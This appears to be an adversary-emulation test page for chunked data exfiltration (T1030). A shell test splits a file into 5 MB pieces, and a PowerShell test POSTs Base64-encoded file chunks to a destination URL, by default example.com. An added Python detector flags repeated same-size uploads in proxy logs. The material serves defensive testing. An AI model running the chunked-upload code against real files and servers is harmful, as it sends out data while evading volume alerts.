An adversary may exfiltrate data in fixed-size chunks instead of whole files, or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
Take a file/directory, split it into 5Mb chunks
Supported Platforms: macOS, Linux
auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | File name | path | T1030_urandom |
| folder_path | Path where the test creates artifacts | path | /tmp/T1030 |
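```sh
# Split the test file into 5,000,000-byte pieces, then list what was created
cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}
```

```sh
# Remove the test folder only if the safe_to_delete marker file is present
if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
```

```sh
# Exit 1 if the test file is missing, 0 if it exists
if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
```

```sh
# Create the folder and marker file if needed, then write a 25,000,000-byte random test file
if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1
```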
Simulate transferring data over a network in small chunks to evade detection.
Supported Platforms: Windows
auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| source_file_path | Path to the source file to transfer. | path | [User specified] |
| destination_url | URL of the destination server. | url | http://example.com |
| chunk_size | Size of each data chunk (in KB). | integer | 1024 |
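```powershell
# Open the source file and size the read buffer (chunk_size is given in KB)
$file = [System.IO.File]::OpenRead(#{source_file_path})
$chunkSize = #{chunk_size} * 1KB
$buffer = New-Object Byte[] $chunkSize
# Read one chunk at a time; Read returns 0 at end of file, which ends the loop
while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
    # Base64-encode only the bytes actually read and POST them as one request
    $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
    Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
}
$file.Close()
```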
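
An added detection example, not part of the page's test definitions: it groups outbound HTTP uploads by source and destination and flags pairs where one request-body size keeps repeating, which is how the chunked transfer above appears in proxy logs even though each request stays small. The record layout, host names, thresholds and the function name `find_uniform_chunk_uploads` are assumptions made for illustration.

```python
from collections import Counter, defaultdict

# Constructed sample proxy records: (source host, destination host, method, request body bytes).
# 1398104 is the Base64 length of one 1024 KB chunk (the Windows test's default chunk_size).
SAMPLE_RECORDS = (
    [("ws-17", "example.com", "POST", 1398104)] * 12
    + [("ws-17", "example.com", "POST", 402332)]  # final, partial chunk
    + [("ws-22", "intranet.local", "POST", 512),
       ("ws-22", "intranet.local", "POST", 20480),
       ("ws-22", "intranet.local", "POST", 7311),
       ("ws-22", "intranet.local", "POST", 1398104)]
)


def find_uniform_chunk_uploads(records, min_repeats=10,
                               min_total_bytes=10_000_000, min_share=0.8):
    """Flag (src, dst) pairs whose uploads are dominated by a single body size.

    The three thresholds are illustrative assumptions; tune them per environment.
    """
    sizes = defaultdict(list)
    for src, dst, method, body_len in records:
        if method in ("POST", "PUT") and body_len > 0:
            sizes[(src, dst)].append(body_len)

    alerts = []
    for (src, dst), lens in sorted(sizes.items()):
        modal_size, repeats = Counter(lens).most_common(1)[0]
        total = sum(lens)
        # Many same-size requests + high share of traffic + large aggregate volume.
        if (repeats >= min_repeats and repeats / len(lens) >= min_share
                and total >= min_total_bytes):
            alerts.append({"src": src, "dst": dst, "chunk_bytes": modal_size,
                           "repeats": repeats, "total_bytes": total})
    return alerts


if __name__ == "__main__":
    for alert in find_uniform_chunk_uploads(SAMPLE_RECORDS):
        print(alert)
```

Aggregating per source and destination over a time window is what catches this pattern; a per-request size threshold alone never sees the total volume.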